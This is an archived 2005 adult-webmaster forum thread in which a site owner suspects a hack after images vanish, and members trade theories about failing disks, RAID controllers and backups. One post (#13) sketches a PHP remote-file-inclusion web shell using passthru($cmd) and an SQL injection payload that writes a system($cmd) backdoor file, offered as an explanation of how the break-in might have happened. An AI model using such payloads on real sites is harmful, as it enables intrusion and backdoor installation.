Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 08-02-2005, 01:34 AM   #1
Paul Markham
Too old to care
 
Paul Markham's Avatar
 
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
We got hacked.

Well we think it's the only way the problem on the site could of happened.

A few weeks ago images started to disappear and at first I thought it was the webmaster responsible for the content slipping up. But over the weekend I noticed it was getting far worse and in every set we're missing 5 to 10 images.

So we are in the process of reloading the entire site, a nightmare job and will be down for at least another day. It's not just the reloading but also the creating of new catalogued pictures that are missing.

Was in the office until 1.00 last night working at it.

Thanks to Bailey at www.sapphicerotica.com for helping us out and letting us use his connection for uploading, it's faster than ours.
Paul Markham is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:37 AM   #2
CaptainHowdy
Too lazy to set a custom title
 
Industry Role:
Join Date: Dec 2004
Location: Happy in the dark.
Posts: 93,652
Fuckersssss!! i hope things get back to normal asap !!
__________________
Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted

Windows VPS now available
Great for TSS, Nifty Stats, remote work, virtual assistants, etc.
CaptainHowdy is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:37 AM   #3
mrthumbs
salad tossing sig guy
 
mrthumbs's Avatar
 
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..
mrthumbs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:38 AM   #4
mrthumbs
salad tossing sig guy
 
mrthumbs's Avatar
 
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
oi bet they have an elite cr3w of hackers each responsible for the pic assigned to him/her. They work globally you know.
mrthumbs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:40 AM   #5
mrthumbs
salad tossing sig guy
 
mrthumbs's Avatar
 
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
they probably discussed and planned this attack months in advance on some underground IRC channel. Or maybe a convention.

You should write a book about the vicious attack.
mrthumbs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:42 AM   #6
mrthumbs
salad tossing sig guy
 
mrthumbs's Avatar
 
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
Maybe they also got acces to your GFY account.

WARNING TO ALL READERS

Dont give out passwords in this thread if Charly asks for it.. it could be the hacker
social engineering.
mrthumbs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:44 AM   #7
Paul Markham
Too old to care
 
Paul Markham's Avatar
 
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by mrthumbs
yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..
So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.
Paul Markham is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:45 AM   #8
mrthumbs
salad tossing sig guy
 
mrthumbs's Avatar
 
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
Quote:
Originally Posted by charly
So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.
Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..


http://www.paulmarkham.com/all-adult-content.php
mrthumbs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 01:45 AM   #9
Repetitive Monkey
Confirmed User
 
Join Date: Feb 2004
Posts: 3,505
You need to stop using you know what as the password for everything, I've told you before on two seperate occasions.
Repetitive Monkey is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 02:06 AM   #10
Paul Markham
Too old to care
 
Paul Markham's Avatar
 
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by Repetitive Monkey
You need to stop using you know what as the password for everything, I've told you before on two seperate occasions.
The database does not have "You know what" as a password. Would not use the one on the boards for the database.

And all the updated and changed.

Yes the server is dedicated and all the image content is on one disc which is again protected, but with FTP access this might have given someone access.

The site is updated as we add new content which is a full time operation. Well nearly.
Paul Markham is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 02:06 AM   #11
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 55,372
first mistake is not to announce that you got hacked.



things you keep hush hush
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 02:22 AM   #12
Paul Markham
Too old to care
 
Paul Markham's Avatar
 
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by fris
first mistake is not to announce that you got hacked.



things you keep hush hush
OK the sites are down for routine maintainence.
Paul Markham is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 02:45 AM   #13
V_RocKs
Damn Right I Kiss Ass!
 
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,421
Put it back up and I'll tell ya how they did it...

Since you use PHP we will start with some basics...

Either 1, you use templates and they were able to use one of their own:

http://www.paulmarkham.com/all-adult....php?p=contact

Which in code is,
Code:
include($p);
Which means they:

http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here

In there file they included was:
Code:
if ($cmd != '') { passthru($cmd); }
Or you are not removing crap that can be sent to the DB so:

http://www.paulmarkham.com/all-adult....php?girl=sara

Becomes:

Code:
http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'--
Of course that would be really simplistic since it would assume that your coder is a complete asshat.

Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.
V_RocKs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 02:57 AM   #14
darksoul
Confirmed User
 
darksoul's Avatar
 
Join Date: Apr 2002
Location: /root/
Posts: 4,997
are you sure your hdd is fine ?
a corrupted harddisk would cause this.
__________________
1337 5y54|)m1n: 157717888
BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN
Cambooth
darksoul is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:04 AM   #15
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
look at the log files on the server, search for the filename missing, and se who last used or moved it
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:09 AM   #16
More Booze
Confirmed User
 
Join Date: Mar 2004
Posts: 5,116
Quote:
Originally Posted by mrthumbs
Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..


http://www.paulmarkham.com/all-adult-content.php
Whats up with all the sarcasm? It could be some script or something the "hacker" left on the server.. :P
More Booze is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:12 AM   #17
broke
Confirmed User
 
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
Quote:
Originally Posted by ebus_dk
look at the log files on the server, search for the filename missing, and se who last used or moved it
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?
__________________
Perfect Gonzo
broke is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:15 AM   #18
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by broke
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?
I faild to se the humor in that
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:22 AM   #19
More Booze
Confirmed User
 
Join Date: Mar 2004
Posts: 5,116
Quote:
Originally Posted by broke
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?
Ummmmm. His serveradmin might do it for him.
More Booze is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:24 AM   #20
beemk
CLICK HERE
 
Industry Role:
Join Date: Jan 2002
Posts: 20,829
Quote:
Originally Posted by mrthumbs
yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..
__________________
I host with Vacares
beemk is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:26 AM   #21
broke
Confirmed User
 
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
Quote:
Originally Posted by ebus_dk
I faild to se the humor in that
Is your E key stuck or just plain broken?
__________________
Perfect Gonzo
broke is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:26 AM   #22
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 55,372
insecure php code rocks.
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 03:30 AM   #23
Paul Markham
Too old to care
 
Paul Markham's Avatar
 
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
Quote:
Originally Posted by darksoul
are you sure your hdd is fine ?
a corrupted harddisk would cause this.
I'm assuming ISPRIME checked that when we asked them about the problem, but will get onto them and make sure, thanks for the suggestion.

V_RocKs thanks for the programming, all double Dutch to me but I have a guy here who knows about these things.

Quote:
look at the log files on the server, search for the filename missing, and se who last used or moved it
We did that and it was no help.

Last edited by charly; 08-02-2005 at 03:32 AM..
Paul Markham is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:02 AM   #24
Trafficbrokercom
Confirmed User
 
Join Date: Dec 2002
Posts: 542
first thing to do is to check /tmp for hidden shellkits ..

so you are uploading the content onto the compromised server again?

don't you want to find the security hole first , make a fresh installation and try everything to avoid this happening in the future?

make sure to set allow_url_fopen = Off in your php.ini
Trafficbrokercom is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:06 AM   #25
DutchTeenCash
I like Dutch Girls
 
DutchTeenCash's Avatar
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
So whats up with daily backups?
DutchTeenCash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:11 AM   #26
riddler
Confirmed User
 
Join Date: Oct 2004
Location: up in gang bang heaven
Posts: 3,726
sounds more like a failing harddrive than a hacker, Hackers usally dont fuck with people they just go in for the kill and get it over with, Sounds like its hitting bad clusters or the file system is corrupted..
riddler is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:15 AM   #27
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by riddler
sounds more like a failing harddrive than a hacker, Hackers usally dont fuck with people they just go in for the kill and get it over with, Sounds like its hitting bad clusters or the file system is corrupted..
yep. or a failing raidcontroller
Try to run a RAID consistency test

Last edited by Machete_; 08-02-2005 at 04:16 AM..
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:21 AM   #28
Roald
SecretFriends.com
 
Roald's Avatar
 
Industry Role:
Join Date: May 2001
Location: IMC Headquarters
Posts: 27,889
Doesn't sound like a hacker to me but more like a failure in your system.

Btw make sure to make backups daily from now on ;)))
__________________


WE ARE BUYING PAY SITES! CONTACT ME



ClubSweethearts | ManUpFilms | SinfulXXX | HOT * AdultPrime * HOT


Paying webmasters since 1996! Contact: r.riepen @ sansylgroup.com | telegram: roaldr
Roald is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:26 AM   #29
broke
Confirmed User
 
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
Quote:
Originally Posted by ebus_dk
yep. or a failing raidcontroller
Try to run a RAID consistency test
Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.
__________________
Perfect Gonzo

Last edited by broke; 08-02-2005 at 04:27 AM..
broke is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:46 AM   #30
Violetta
Affiliate
 
Violetta's Avatar
 
Join Date: Jul 2004
Posts: 28,735
Quote:
Originally Posted by darksoul
are you sure your hdd is fine ?
a corrupted harddisk would cause this.
It could. What OS do you run?
__________________
M&A Queen
Violetta is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 04:49 AM   #31
mikeyddddd
Viva la vulva!
 
mikeyddddd's Avatar
 
Join Date: Mar 2003
Location: you can't please everyone, so you got to please yourself
Posts: 16,557
Have you let Lee help you with any problems recently?
mikeyddddd is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 05:17 AM   #32
Rui
web
 
Join Date: Dec 2001
Location: On icq: 85-483-060
Posts: 9,533
bummer, hope you find how they got in, secure the site and if possible nail the bastards (asking too much)
Rui is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 05:30 AM   #33
pussyluver
Clueless OleMan
 
Join Date: Mar 2003
Location: ICQ - 169903487
Posts: 11,009
nothing better for conversions, traffic, and bookmarks than to have a site down for a day or more
pussyluver is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 05:48 AM   #34
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by broke
Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

The old Compaq smartarrayII verion 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-02-2005, 05:52 AM   #35
DutchTeenCash
I like Dutch Girls
 
DutchTeenCash's Avatar
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
Quote:
Originally Posted by ebus_dk

The old Compaq smartarrayII verion 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month
we had them too in the company where I used to work BIG issues, our own are dells now fine and with daily backups you cant go wrong
DutchTeenCash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.